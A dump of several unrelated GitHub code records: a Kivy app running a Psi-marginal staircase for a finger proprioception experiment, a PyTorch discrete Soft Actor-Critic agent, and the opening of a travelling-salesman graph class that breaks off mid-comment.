guessPrior, lapsePrior.\n\n ('normal',0,1): normal distribution, mean and standard deviation.\n\n ('uniform',None) : uniform distribution, mean and standard deviation not defined.\n\n slope :\n (sigma) range of possible slope values to search\n\n slopePrior :\n see thresholdPrior\n\n guessRate :\n (gamma) range of possible guessing rate values to search\n\n guessPrior :\n see thresholdPrior\n\n lapseRate :\n (lambda) range of possible lapse rate values to search\n\n lapsePrior :\n see thresholdPrior\n\n marginalize (bool) :\n If True, marginalize out the lapse rate 
and guessing rate before finding the stimulus\n intensity of lowest expected entropy. This uses the Prins (2013) method to include the guessing and lapse rate\n into the probability disctribution. These rates are then marginalized out, and only the threshold and slope are included\n in selection of the stimulus intensity.\n\n If False, lapse rate and guess rate are included in the selection of stimulus intensity.\n\n How to use\n ----------\n Create a psi object instance with all relevant arguments. Selecting a correct search space for the threshold,\n slope, guessing rate and lapse rate is important for the psi procedure to function well. If an estimate for\n one of the parameters ends up at its (upper or lower) limit, the result is not reliable, and the procedure\n should be repeated with a larger search range for that parameter.\n\n Example:\n >>> s = range(-5,5) # possible stimulus intensities\n obj = Psi(s)\n\n The stimulus intensity to be used in the current trial can be found in the field xCurrent.\n\n Example:\n >>> stim = obj.xCurrent\n NOTE: if obj.xCurrent returns None, the calculation is not yet finished.\n This can be avoided by waiting until xCurrent has a numeric value, e.g.:\n >>> while obj.xCurrent == None:\n pass # hang in this loop until the psi calculation has finished\n stim = obj.xCurrent\n\n After each trial, update the psi staircase with the subject response, by calling the addData method.\n\n Example:\n >>> obj.addData(resp)\n \"\"\"\n\n def __init__(self, stimRange, Pfunction='cGauss', nTrials=50, threshold=None, thresholdPrior=('uniform', None),\n slope=None, slopePrior=('uniform', None),\n guessRate=None, guessPrior=('uniform', None), lapseRate=None, lapsePrior=('uniform', None),\n marginalize=True, thread=True):\n\n # Psychometric function parameters\n self.stimRange = stimRange # range of stimulus intensities\n self.version = 1.0\n self.threshold = np.arange(-10, 10, 0.1)\n self.slope = np.arange(0.005, 20, 0.1)\n self.guessRate = np.arange(0.0, 0.11, 0.05)\n self.lapseRate = np.arange(0.0, 0.11, 0.05)\n self.marginalize = marginalize # marginalize out nuisance parameters gamma and lambda?\n self.psyfun = Pfunction\n self.thread = thread\n\n if threshold is not None:\n self.threshold = threshold\n if np.shape(self.threshold) == ():\n self.threshold = np.expand_dims(self.threshold, 0)\n if slope is not None:\n self.slope = slope\n if np.shape(self.slope) == ():\n self.slope = np.expand_dims(self.slope, 0)\n if guessRate is not None:\n self.guessRate = guessRate\n if np.shape(self.guessRate) == ():\n self.guessRate = np.expand_dims(self.guessRate, 0)\n if lapseRate is not None:\n self.lapseRate = lapseRate\n if np.shape(self.lapseRate) == ():\n self.lapseRate = np.expand_dims(self.lapseRate, 0)\n\n # Priors\n self.thresholdPrior = thresholdPrior\n self.slopePrior = slopePrior\n self.guessPrior = guessPrior\n self.lapsePrior = lapsePrior\n\n self.priorMu = self.__genprior(self.threshold, *thresholdPrior)\n self.priorSigma = self.__genprior(self.slope, *slopePrior)\n self.priorGamma = self.__genprior(self.guessRate, *guessPrior)\n self.priorLambda = self.__genprior(self.lapseRate, *lapsePrior)\n\n # if guess rate equals lapse rate, and they have equal priors,\n # then gamma can be left out, as the distributions will be the same\n self.gammaEQlambda = all((all(self.guessRate == self.lapseRate), all(self.priorGamma == self.priorLambda)))\n # likelihood: table of conditional probabilities p(response | alpha,sigma,gamma,lambda,x)\n # prior: prior probability over all 
parameters p_0(alpha,sigma,gamma,lambda)\n if self.gammaEQlambda:\n self.dimensions = (len(self.threshold), len(self.slope), len(self.lapseRate), len(self.stimRange))\n self.likelihood = np.reshape(\n pf(cartesian((self.threshold, self.slope, self.lapseRate, self.stimRange)), psyfun=Pfunction), self.dimensions)\n # row-wise products of prior probabilities\n self.prior = np.reshape(\n np.prod(cartesian((self.priorMu, self.priorSigma, self.priorLambda)), axis=1), self.dimensions[:-1])\n else:\n self.dimensions = (len(self.threshold), len(self.slope), len(self.guessRate), len(self.lapseRate), len(self.stimRange))\n self.likelihood = np.reshape(\n pf(cartesian((self.threshold, self.slope, self.guessRate, self.lapseRate, self.stimRange)), psyfun=Pfunction), self.dimensions)\n # row-wise products of prior probabilities\n self.prior = np.reshape(\n np.prod(cartesian((self.priorMu, self.priorSigma, self.priorGamma, self.priorLambda)), axis=1), self.dimensions[:-1])\n\n # normalize prior\n self.prior = self.prior / np.sum(self.prior)\n\n # Set probability density function to prior\n self.pdf = np.copy(self.prior)\n\n # settings\n self.iTrial = 0\n self.nTrials = nTrials\n self.stop = 0\n self.response = []\n self.stim = []\n\n # Generate the first stimulus intensity\n self.minEntropyStim()\n\n def __genprior(self, x, distr='uniform', mu=0, sig=1):\n \"\"\"Generate prior probability distribution for variable.\n\n Arguments\n ---------\n x : 1D numpy array (float64)\n points to evaluate the density at.\n\n distr : string\n Distribution to use a prior :\n 'uniform' (default) discrete uniform distribution\n\n 'normal' normal distribution\n\n 'gamma' gamma distribution\n\n 'beta' beta distribution\n\n mu : scalar float\n first parameter of distr distribution (check scipy for parameterization)\n\n sig : scalar float\n second parameter of distr distribution\n\n Returns\n -------\n 1D numpy array of prior probabilities (unnormalized)\n \"\"\"\n if distr == 'uniform':\n nx = len(x)\n p = np.ones(nx) / nx\n elif distr == 'normal':\n p = np.exp(-(x-mu)**2 / (2.0*(sig)**2)) / np.sqrt(2.0*np.pi*(sig)**2)\n elif distr == 'beta':\n OnePx = (sig - 1.0) * np.log1p(-x) + (mu - 1.0) * np.log(x)\n beta = math.gamma(mu) * math.gamma(sig) / math.gamma(mu + sig)\n OnePx -= np.log(np.abs(beta))\n p = np.exp(OnePx)\n elif distr == 'gamma':\n p = x ** (mu - 1) * (np.exp(-x)) / math.gamma(sig)\n else:\n nx = len(x)\n p = np.ones(nx) / nx\n return p\n\n def meta_data(self):\n import time\n import sys\n metadata = {}\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(time.time()))\n metadata['date'] = date\n metadata['Version'] = self.version\n metadata['Python Version'] = sys.version\n metadata['Numpy Version'] = np.__version__\n metadata['Scipy Version '] = scipy.__version__\n metadata['psyFunction'] = self.psyfun\n metadata['thresholdGrid'] = self.threshold.tolist()\n metadata['thresholdPrior'] = self.thresholdPrior\n metadata['slopeGrid'] = self.slope.tolist()\n metadata['slopePrior'] = self.slopePrior\n metadata['gammaGrid'] = self.guessRate.tolist()\n metadata['gammaPrior'] = self.guessPrior\n metadata['lapseGrid'] = self.lapseRate.tolist()\n metadata['lapsePrior'] = self.lapsePrior\n return metadata\n\n def __entropy(self, pdf):\n \"\"\"Calculate shannon entropy of posterior distribution.\n Arguments\n ---------\n pdf : ndarray (float64)\n posterior distribution of psychometric curve parameters for each stimuli\n\n\n Returns\n -------\n 1D numpy array (float64) : Shannon entropy of posterior for each stimuli\n 
\"\"\"\n # Marginalize out all nuisance parameters, i.e. all except alpha and sigma\n postDims = np.ndim(pdf)\n if self.marginalize == True:\n while postDims > 3: # marginalize out second-to-last dimension, last dim is x\n pdf = np.sum(pdf, axis=-2)\n postDims -= 1\n # find expected entropy, suppress divide-by-zero and invalid value warnings\n # as this is handled by the NaN redefinition to 0\n with np.errstate(divide='ignore', invalid='ignore'):\n entropy = np.multiply(pdf, np.log(pdf))\n entropy[np.isnan(entropy)] = 0 # define 0*log(0) to equal 0\n dimSum = tuple(range(postDims - 1)) # dimensions to sum over. also a Chinese dish\n entropy = -(np.sum(entropy, axis=dimSum))\n return entropy\n\n def minEntropyStim(self):\n \"\"\"Find the stimulus intensity based on the expected information gain.\n\n Minimum Shannon entropy is used as selection criterion for the stimulus intensity in the upcoming trial.\n \"\"\"\n self.pdf = self.pdf\n self.nX = len(self.stimRange)\n self.nDims = np.ndim(self.pdf)\n\n # make pdf the same dims as conditional prob table likelihood\n self.pdfND = np.expand_dims(self.pdf, axis=self.nDims) # append new axis\n self.pdfND = np.tile(self.pdfND, (self.nX)) # tile along new axis\n\n # Probabilities of response r (succes, failure) after presenting a stimulus\n # with stimulus intensity x at the next trial, multiplied with the prior (pdfND)\n self.pTplus1success = np.multiply(self.likelihood, self.pdfND)\n self.pTplus1failure = self.pdfND - self.pTplus1success\n\n # Probability of success or failure given stimulus intensity x, p(r|x)\n self.sumAxes = tuple(range(self.nDims)) # sum over all axes except the stimulus intensity axis\n self.pSuccessGivenx = np.sum(self.pTplus1success, axis=self.sumAxes)\n self.pFailureGivenx = np.sum(self.pTplus1failure, axis=self.sumAxes)\n\n # Posterior probability of parameter values given stimulus intensity x and response r\n # p(alpha, sigma | x, r)\n self.posteriorTplus1success = self.pTplus1success / self.pSuccessGivenx\n self.posteriorTplus1failure = self.pTplus1failure / self.pFailureGivenx\n\n # Expected entropy for the next trial at intensity x, producing response r\n self.entropySuccess = self.__entropy(self.posteriorTplus1success)\n self.entropyFailure = self.__entropy(self.posteriorTplus1failure)\n self.expectEntropy = np.multiply(self.entropySuccess, self.pSuccessGivenx) + np.multiply(self.entropyFailure,\n self.pFailureGivenx)\n self.minEntropyInd = np.argmin(self.expectEntropy) # index of smallest expected entropy\n self.xCurrent = self.stimRange[self.minEntropyInd] # stim intensity at minimum expected entropy\n\n self.iTrial += 1\n if self.iTrial == (self.nTrials - 1):\n self.stop = 1\n\n def addData(self, response):\n \"\"\"\n Add the most recent response to start calculating the next stimulus intensity\n\n Arguments\n ---------\n response: (int)\n 1: correct/right\n\n 0: incorrect/left\n \"\"\"\n self.stim.append(self.xCurrent)\n self.response.append(response)\n\n self.xCurrent = None\n\n # Keep the posterior probability distribution that corresponds to the recorded response\n if response == 1:\n # select the posterior that corresponds to the stimulus intensity of lowest entropy\n self.pdf = self.posteriorTplus1success[Ellipsis, self.minEntropyInd]\n elif response == 0:\n self.pdf = self.posteriorTplus1failure[Ellipsis, self.minEntropyInd]\n\n # normalize the pdf\n self.pdf = self.pdf / np.sum(self.pdf)\n\n # Marginalized probabilities per parameter\n if self.gammaEQlambda:\n self.pThreshold = np.sum(self.pdf, axis=(1, 
2))\n self.pSlope = np.sum(self.pdf, axis=(0, 2))\n self.pLapse = np.sum(self.pdf, axis=(0, 1))\n self.pGuess = self.pLapse\n else:\n self.pThreshold = np.sum(self.pdf, axis=(1, 2, 3))\n self.pSlope = np.sum(self.pdf, axis=(0, 2, 3))\n self.pLapse = np.sum(self.pdf, axis=(0, 1, 2))\n self.pGuess = np.sum(self.pdf, axis=(0, 1, 3))\n\n # Distribution means as expected values of parameters\n self.eThreshold = np.sum(np.multiply(self.threshold, self.pThreshold))\n self.eSlope = np.sum(np.multiply(self.slope, self.pSlope))\n self.eLapse = np.sum(np.multiply(self.lapseRate, self.pLapse))\n self.eGuess = np.sum(np.multiply(self.guessRate, self.pGuess))\n\n # Distribution std of parameters\n self.stdThreshold = np.sqrt(np.sum(np.multiply((self.threshold - self.eThreshold) ** 2, self.pThreshold)))\n self.stdSlope = np.sqrt(np.sum(np.multiply((self.slope - self.eSlope) ** 2, self.pSlope)))\n self.stdLapse = np.sqrt(np.sum(np.multiply((self.lapseRate - self.eLapse) ** 2, self.pLapse)))\n self.stdGuess = np.sqrt(np.sum(np.multiply((self.guessRate - self.eGuess) ** 2, self.pGuess)))\n\n # Start calculating the next minimum entropy stimulus\n \n if self.thread:\n threading.Thread(target=self.minEntropyStim).start()\n else:\n self.minEntropyStim()\n \n# This works on ubuntu, not on Windows\ntimestamp = time.strftime(\"%Y%m%d_%H:%M:%S\")\n\n# If running on a Windows PC, run the following\n# timestamp = time.strftime(\"%Y%m%d_%H_%M_%S\")\n\n# If running on an android device, set the right path to save the JSON file\nif platform == 'android':\n from jnius import autoclass, cast, JavaException\n\n try:\n PythonActivity = autoclass('org.kivy.android.PythonActivity')\n except JavaException:\n PythonActivity = autoclass('org.renpy.android.PythonActivity')\n\n Environment = autoclass('android.os.Environment')\n context = cast('android.content.Context', PythonActivity.mActivity)\n private_storage = context.getExternalFilesDir(Environment.getDataDirectory().getAbsolutePath()).getAbsolutePath()\n\n store = JsonStore(\".\".join([private_storage, timestamp, 'json']))\n\n# This is mainly for testing on a Linux Desktop\nelse:\n store = JsonStore(\".\".join([timestamp, 'json']))\n\n# Prepare dictionaries to save information\nsubj_info = {}\nsubj_anth = {}\nsubj_trial_info = {}\n\n# These are Psi-Marginal Staircase related parameters\n# mu = threshold parameter\n# sigma = slope parameter\n# StimLevels = delta angle\nntrials = 50\nmu = np.linspace(0, 15, 61)\nsigma = np.linspace(0.05, 1, 21)\nlapse = np.linspace(0, 0.1, 15)\nguessRate = 0.5\n# 5.0 degrees deviation means the exact spot of the center of an index finger - skipped\nstimLevels = np.concatenate((np.arange(0, 5, 0.1), np.arange(5.1, 10, 0.1), np.arange(10, 16, 1)))\n\nthresholdPrior = ('normal', 13, 3)\nslopePrior = ('gamma', 2, 0.3)\nlapsePrior = ('beta', 2, 20)\n\npsi_obj = Psi(stimLevels, Pfunction = 'Gumbel', nTrials = ntrials, threshold = mu, thresholdPrior = thresholdPrior, slope = sigma, slopePrior = slopePrior, guessRate = guessRate, guessPrior = ('uniform', None), lapseRate = lapse, lapsePrior = lapsePrior, marginalize = True)\n\nclass CalibrationScreen(Screen):\n\n # Popup window\n def show_popup(self):\n\n the_popup = CalibPopup(title = \"READ IT\", size_hint = (None, None), size = (400, 400))\n the_popup.open()\n\nclass CalibPopup(Popup):\n pass\n\nclass ParamPopup(Popup):\n pass\n\nclass ParamInputScreenOne(Screen):\n\n male = ObjectProperty(True)\n female = ObjectProperty(False)\n right = ObjectProperty(True)\n left = ObjectProperty(False)\n\n 
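# --- Illustrative aside (not part of the original record) --------------------
# A minimal standalone sketch of the marginalization pattern used in addData()
# above: collapse the joint posterior grid over (threshold, slope, lapse) into
# per-parameter marginals, then take expected values and standard deviations.
# The grids mirror the mu/sigma/lapse grids defined in this record; the
# posterior here is a random stand-in, purely for illustration.
import numpy as np

threshold = np.linspace(0, 15, 61)
slope = np.linspace(0.05, 1, 21)
lapse = np.linspace(0, 0.1, 15)

pdf = np.random.rand(61, 21, 15)      # stand-in for the joint posterior
pdf /= pdf.sum()                      # normalize, as the class does

p_threshold = pdf.sum(axis=(1, 2))    # marginal over slope and lapse
e_threshold = np.sum(threshold * p_threshold)
sd_threshold = np.sqrt(np.sum((threshold - e_threshold) ** 2 * p_threshold))
# -----------------------------------------------------------------------------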
gender = ObjectProperty(None)\n handed_chk = ObjectProperty(False)\n\n # Popup window to check if everything is saved properly\n def show_popup(self):\n\n the_popup = ParamPopup(title = \"READ IT\", size_hint = (None, None), size = (400, 400))\n\n # Check if any of the parameter inputs is missing!\n if any([self.pid_text_input.text == \"\", self.age_text_input.text == \"\", self.gender == None, self.handed_chk == False]) is True:\n the_popup.argh.text = \"Value Missing!\"\n the_popup.open()\n else:\n global subid\n subid = \"_\".join([\"SUBJ\", self.pid_text_input.text])\n global subj_info\n subj_info = {'age' : self.age_text_input.text, 'gender' : self.gender, 'right_used' : self.ids.rightchk.active}\n self.parent.current = \"param_screen_two\"\n\n def if_active_m(self, state):\n if state:\n # Whill change the orientation of the testscreen's colorscreen\n self.gender = \"M\"\n\n def if_active_f(self, state):\n if state:\n self.gender = \"F\"\n\n def if_active_r(self, state):\n if state:\n # Will change the orientation of the testscreen's colorscreen\n self.parent.ids.testsc.handedness.dir = 1\n #self.parent.ids.testsc.handedness.degree = -35\n\n # Just for fool-proof\n self.handed_chk = True\n\n def if_active_l(self, state):\n if state:\n self.parent.ids.testsc.handedness.dir = -1\n #self.parent.ids.testsc.handedness.degree = 35\n\n # Just for fool-proof\n self.handed_chk = True\n\nclass ParamInputScreenTwo(Screen):\n\n # Popup window to check if everything is entered\n def show_popup2(self):\n\n the_popup = ParamPopup(title = \"READ IT\", size_hint = (None, None), size = (400, 400))\n\n # Check if any of the parameter inputs is missing!\n if any([self.flen_text_input.text == \"\", self.fwid_text_input.text == \"\", self.initd_text_input.text == \"\", self.mprad_text_input.text == \"\"]):\n the_popup.argh.text = \"Something's missing!\"\n the_popup.open()\n else:\n global subj_anth\n subj_anth = {'flen' : self.flen_text_input.text, 'fwid' : self.fwid_text_input.text, 'init_step' : self.initd_text_input.text, 'MPJR' : self.mprad_text_input.text}\n\n # Give the mp joint radius input to draw the test screen display\n self.parent.ids.testsc.handedness.mprad = self.mprad_text_input.text\n self.parent.current = \"test_screen\"\n\nclass TestScreen(Screen):\n\n handedness = ObjectProperty(None)\n\n def __init__(self, **kwargs):\n super(TestScreen, self).__init__(**kwargs)\n self.rgblist1 = [(1, 0, 0, 1), (1, 1, 0, 1), (0, 1, 0, 1)]\n self.rgblist2 = [(0, 0, 1, 1), (0.5, 0, 1, 1), (1, 0.56, 0.75, 1)]\n self.rgbindex = 0\n # checking if the reverse is happening\n self.prev_choice = list()\n # session number\n self.session_num = 0\n # check the trial number(within a session)\n self.trial_num = 0\n # Keep the record of total trials(regardless of session)\n self.trial_total = 0\n\n self.mov_angle = psi_obj.xCurrent\n\n # changes the color of the buttons as well as the screen\n def change_col_setting(self):\n rgb_index = randrange(0, 3, 1)\n while rgb_index == self.rgbindex:\n rgb_index = randrange(0, 3, 1)\n self.ids.cw.bg_color_after = self.rgblist1[rgb_index]\n self.ids.cw.bg_color_before = self.rgblist2[rgb_index]\n self.ids._more_left.background_normal = ''\n self.ids._more_left.background_color = self.ids.cw.bg_color_after\n self.ids._more_right.background_normal = ''\n self.ids._more_right.background_color = self.ids.cw.bg_color_before\n self.rgbindex = rgb_index\n\n # keep track of reversals\n def track_choices(self, response):\n self.prev_choice.append(response)\n\n def 
where_is_your_finger(self, rel_pos):\n\n # change the colors of the screen\n self.change_col_setting()\n\n # Add the current choice, check if reversal is happening\n self.track_choices(rel_pos)\n\n # Save the current degree\n degree_current = self.ids.cw.degree\n\n # Check if the respons('on the left' or 'on the right') is correct\n # Get the current third x-coordinate of the quadrilateral, or the fourth point of the quadrilateral\n # Compare it with the true third x-coordinate of the quadrilateral\n # If the current x-coordinate is greater than the true value, the correct answer should be \"left\"\n # If the current x-coordinate is smaller than the true value, the correct answer should be \"right\"\n # If neither, the response is \"on_the_spot\"\n x_coord_current = self.ids.cw.quad_points[4]\n if x_coord_current > self.ids.cw.x_correct:\n correct_ans = \"left\"\n elif x_coord_current < self.ids.cw.x_correct:\n correct_ans = \"right\"\n else:\n correct_ans = \"on_the_spot\"\n\n # Compare if the answer is correct\n right_or_wrong = int(rel_pos == correct_ans)\n global psi_obj\n psi_obj.addData(right_or_wrong)\n while psi_obj.xCurrent is None:\n pass\n\n # next step deviation angle\n if rel_pos == 'left':\n\n # Set the left limit\n if (self.ids.cw.quad_points[6] + self.ids.cw.height*math.tan(math.radians(psi_obj.xCurrent)) < self.ids.cw.x):\n self.ids.cw.degree = math.degrees(math.atan((self.ids.cw.x - self.ids.cw.quad_points[6]) / self.ids.cw.height))\n else:\n self.ids.cw.degree = float(psi_obj.xCurrent)\n\n elif rel_pos == 'right':\n\n # Set the right limit\n if (self.ids.cw.quad_points[6] + self.ids.cw.height*math.tan(math.radians(psi_obj.xCurrent)) > self.ids.cw.right):\n self.ids.cw.degree = math.degrees(math.atan((self.ids.cw.right - self.ids.cw.quad_points[6]) / self.ids.cw.height))\n else:\n self.ids.cw.degree = float(psi_obj.xCurrent)\n\n #global subj_trial_info\n subj_trial_info[\"_\".join([\"TRIAL\", str(self.trial_total)])] = {'session': self.session_num, 'trial_in_session': self.trial_num, 'reference(deg)': self.ids.cw.false_ref, 'offset(deg)': degree_current, 'correct_x': self.ids.cw.x_correct, 'x_coord_current': x_coord_current, 'correct_ans': correct_ans, 'response': self.prev_choice[-1], 'response_correct': right_or_wrong}\n\n self.trial_num += 1\n self.trial_total += 1\n\n\n # Print the trial number and the deviation angle(deg)\n # The value of the deviation angle is the angle between\n # - the vertical line that passes the MP joint\n # - the line that connects the MP joint and the upper right point of the quadrilateral\n #print(\"trial: \", self.trial_num, \"session: \", self.session_num, \"correct_ans: \", correct_ans, \"rel_pos: \", rel_pos, \"right_or_wrong: \", right_or_wrong, \"Previous_delta_d: \", degree_current, \"Next delta_d: \", self.ids.cw.degree, self.ids.cw.false_ref)\n\n if self.trial_num == 50:\n self.reset(self.session_num)\n\n def reset(self, session_num):\n # Renew the list of stored choices\n self.prev_choice = list()\n\n # Trial number renewed\n self.trial_num = 0\n\n # Psi marginal algorithm refreshed\n global psi_obj\n psi_obj = Psi(stimLevels, Pfunction = 'Gumbel', nTrials = ntrials, threshold = mu, thresholdPrior = thresholdPrior, slope = sigma, slopePrior = slopePrior, guessRate = guessRate, guessPrior = ('uniform', None), lapseRate = lapse, lapsePrior = lapsePrior, marginalize = True)\n\n # New display setting\n self.ids.cw.degree = float(psi_obj.xCurrent)\n\n if session_num == 0:\n # A new session begins\n self.session_num +=1\n\n # False 
reference moving to 45\n self.ids.cw.false_ref = 45\n # ... and the psi output will now be \"added\"\n self.ids.cw.degree_dir = 1\n\n # There's no turning back\n self.ids.layout.remove_widget(self.ids._backward)\n\n # The buttons would be disabled until an experimenter presses the 'resume' button\n self.ids._more_left.disabled = True\n self.ids._more_right.disabled = True\n\n # Only two sessions exist: 0 or 1\n # If session 1 finishes, you reset everthing to have a next subject\n else:\n # Dump everything to the store\n store.put(subid, subj_info = subj_info, subj_anth = subj_anth, subj_trial_info = subj_trial_info)\n\n self.session_num -= 1\n\n # False reference returning to 55\n self.ids.cw.false_ref = 55\n # ... and the psi output \"subtracted\"\n self.ids.cw.degree_dir = -1\n\n # Bring the back button again\n self.ids.layout.add_widget(self.ids._backward)\n\n # Total trial count reset to 0\n self.trial_total = 0\n\n # Go to the outcome screen\n self.parent.current = \"outcome_screen\"\n\nclass OutcomeScreen(Screen):\n\n def start_a_new_subject(self):\n self.parent.current = \"param_screen_one\"\n\nclass screen_manager(ScreenManager):\n pass\n\nclass ProprioceptiveApp(App):\n\n def build(self):\n return screen_manager(transition=FadeTransition())\n\nif __name__ == '__main__':\n ProprioceptiveApp().run()\n","repo_name":"ohspc89/FingerProprioceptionApp","sub_path":"Psi-marginal/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30994,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"8947841043","text":"import numpy as np\nfrom Brain.model import PolicyNetwork, QValueNetwork\nimport torch\nfrom Memory.replay_memory import Memory, Transition\nfrom torch import from_numpy\nfrom torch.optim.adam import Adam\nfrom torch.nn import functional as F\n\n\nclass SAC:\n def __init__(self, **config):\n self.config = config\n self.state_shape = self.config[\"state_shape\"]\n self.n_actions = self.config[\"n_actions\"]\n self.lr = self.config[\"lr\"]\n self.gamma = self.config[\"gamma\"]\n self.batch_size = self.config[\"batch_size\"]\n self.memory = Memory(memory_size=self.config[\"mem_size\"])\n\n self.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n self.policy_network = PolicyNetwork(state_shape=self.state_shape, n_actions=self.n_actions).to(self.device)\n self.q_value_network1 = QValueNetwork(state_shape=self.state_shape, n_actions=self.n_actions).to(self.device)\n self.q_value_network2 = QValueNetwork(state_shape=self.state_shape, n_actions=self.n_actions).to(self.device)\n self.q_value_target_network1 = QValueNetwork(state_shape=self.state_shape,\n n_actions=self.n_actions).to(self.device)\n self.q_value_target_network2 = QValueNetwork(state_shape=self.state_shape,\n n_actions=self.n_actions).to(self.device)\n\n self.q_value_target_network1.load_state_dict(self.q_value_network1.state_dict())\n self.q_value_target_network1.eval()\n\n self.q_value_target_network2.load_state_dict(self.q_value_network2.state_dict())\n self.q_value_target_network2.eval()\n\n self.entropy_target = 0.98 * (-np.log(1 / self.n_actions))\n self.log_alpha = torch.zeros(1, requires_grad=True, device=self.device)\n self.alpha = self.log_alpha.exp()\n\n self.q_value1_opt = Adam(self.q_value_network1.parameters(), lr=self.lr)\n self.q_value2_opt = Adam(self.q_value_network2.parameters(), lr=self.lr)\n self.policy_opt = Adam(self.policy_network.parameters(), lr=self.lr)\n self.alpha_opt = Adam([self.log_alpha], lr=self.lr)\n\n 
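# --- Illustrative aside (not part of the original record) --------------------
# The entropy_target above follows the common discrete-SAC heuristic of 98% of
# the maximum policy entropy, log(n_actions). A standalone sketch of the
# temperature (alpha) update that train() performs later, with hypothetical
# numbers; only the formula itself is taken from this record.
import numpy as np
import torch

n_actions = 4                                        # hypothetical action count
entropy_target = 0.98 * (-np.log(1 / n_actions))     # ~1.359 for 4 actions
log_alpha = torch.zeros(1, requires_grad=True)

probs = torch.softmax(torch.randn(8, n_actions), dim=-1)   # dummy policy output
log_probs = (probs * torch.log(probs)).sum(-1)              # sum of p*log p per state
alpha_loss = -(log_alpha * (log_probs.detach() + entropy_target)).mean()
alpha_loss.backward()        # gradient pushes alpha up while entropy < target
alpha = log_alpha.exp()
# -----------------------------------------------------------------------------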
self.update_counter = 0\n\n def store(self, state, action, reward, next_state, done):\n state = from_numpy(state).byte().to(\"cpu\")\n reward = torch.CharTensor([reward])\n action = torch.ByteTensor([action]).to('cpu')\n next_state = from_numpy(next_state).byte().to('cpu')\n done = torch.BoolTensor([done])\n self.memory.add(state, reward, done, action, next_state)\n\n def unpack(self, batch):\n batch = Transition(*zip(*batch))\n\n states = torch.cat(batch.state).to(self.device).view(self.batch_size, *self.state_shape)\n actions = torch.cat(batch.action).view((-1, 1)).long().to(self.device)\n rewards = torch.cat(batch.reward).view((-1, 1)).to(self.device)\n next_states = torch.cat(batch.next_state).to(self.device).view(self.batch_size, *self.state_shape)\n dones = torch.cat(batch.done).view((-1, 1)).to(self.device)\n\n return states, rewards, dones, actions, next_states\n\n def train(self):\n if len(self.memory) < self.batch_size:\n return 0, 0, 0\n else:\n batch = self.memory.sample(self.batch_size)\n states, rewards, dones, actions, next_states = self.unpack(batch)\n\n # Calculating the Q-Value target\n with torch.no_grad():\n _, next_probs = self.policy_network(next_states)\n next_log_probs = torch.log(next_probs)\n next_q1 = self.q_value_target_network1(next_states)\n next_q2 = self.q_value_target_network2(next_states)\n next_q = torch.min(next_q1, next_q2)\n next_v = (next_probs * (next_q - self.alpha * next_log_probs)).sum(-1).unsqueeze(-1)\n target_q = rewards + self.gamma * (~dones) * next_v\n\n q1 = self.q_value_network1(states).gather(1, actions)\n q2 = self.q_value_network2(states).gather(1, actions)\n q1_loss = F.mse_loss(q1, target_q)\n q2_loss = F.mse_loss(q2, target_q)\n\n # Calculating the Policy target\n _, probs = self.policy_network(states)\n log_probs = torch.log(probs)\n with torch.no_grad():\n q1 = self.q_value_network1(states)\n q2 = self.q_value_network2(states)\n q = torch.min(q1, q2)\n\n policy_loss = (probs * (self.alpha.detach() * log_probs - q)).sum(-1).mean()\n\n self.q_value1_opt.zero_grad()\n q1_loss.backward()\n self.q_value1_opt.step()\n\n self.q_value2_opt.zero_grad()\n q2_loss.backward()\n self.q_value2_opt.step()\n\n self.policy_opt.zero_grad()\n policy_loss.backward()\n self.policy_opt.step()\n\n log_probs = (probs * log_probs).sum(-1)\n alpha_loss = -(self.log_alpha * (log_probs.detach() + self.entropy_target)).mean()\n\n self.alpha_opt.zero_grad()\n alpha_loss.backward()\n self.alpha_opt.step()\n\n self.update_counter += 1\n\n self.alpha = self.log_alpha.exp()\n\n if self.update_counter % self.config[\"fixed_network_update_freq\"] == 0:\n self.hard_update_target_network()\n\n return alpha_loss.item(), 0.5 * (q1_loss + q2_loss).item(), policy_loss.item()\n\n def choose_action(self, states, do_greedy=False):\n states = np.expand_dims(states, axis=0)\n states = from_numpy(states).byte().to(self.device)\n with torch.no_grad():\n dist, p = self.policy_network(states)\n if do_greedy:\n action = p.argmax(-1)\n else:\n action = dist.sample()\n return action.detach().cpu().numpy()[0]\n\n def hard_update_target_network(self):\n self.q_value_target_network1.load_state_dict(self.q_value_network1.state_dict())\n self.q_value_target_network1.eval()\n self.q_value_target_network2.load_state_dict(self.q_value_network2.state_dict())\n self.q_value_target_network2.eval()\n\n def set_to_eval_mode(self):\n 
self.policy_network.eval()\n","repo_name":"alirezakazemipour/Discrete-SAC-PyTorch","sub_path":"Brain/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":6236,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"94"} +{"seq_id":"7689687636","text":"import math\n\n#provided function\ndef euclid(p,q):\n x = p[0]-q[0]\n y = p[1]-q[1]\n return math.sqrt(x*x+y*y)\n \nclass Graph:\n\n # Complete as described in the specification, taking care of two cases:\n # the -1 case, where we read points in the Euclidean plane, and\n # the n>0 case, where we read a general graph in a different format.\n # self.perm, self.dists, self.n are the key variables to be set up.\n def __init__(self,n,filename):\n if n == -1: #Intializing where flag is -1\n self.perm = []\n self.n = 0\n for line in open(filename).readlines( ): #number of node is equivalent to number of lines\n self.n += 1 #Increments number of nodes with every iteration\n with open (filename) as fp: #This creates a list of tuples from the given file\n result = []\n for i in fp.readlines():\n tmp = i.encode().split() #encode() is used to get set of bytes instead of str for the split, splits at the middle space\n result.append((int(tmp[0]),int(tmp[1]))) #creates the tuple from the 2 parts of the split\n self.dists = [[0 for x in range (self.n)] for y in range (self.n)]\n for i in range(self.n):\n for j in range(self.n): #using the list of tuples to fill self.dists\n self.dists[i][j] = self.dists[j][i] = euclid(result[i],result[j])\n for y in range (self.n):\n self.perm.append(y)\n \n else: #For case where n is given\n self.perm = []\n self.n = n \n with open (filename) as fp:\n result = []\n for i in fp.readlines(): #Creates list of tuples (with 3 elements) from the given file\n tmp = i.encode().split() #same as above\n result.append((int(tmp[0]),int(tmp[1]),int(tmp[2]))) #creates the tuples from the 3 parts of the split\n self.dists = [[0 for x in range (self.n)] for y in range (self.n)]\n for i in result: #using list of tuples to fill self.dists\n self.dists[i[0]][i[1]] = self.dists[i[1]][i[0]] = i[2]\n for y in range (self.n):\n self.perm.append(y)\n \n # Complete as described in the 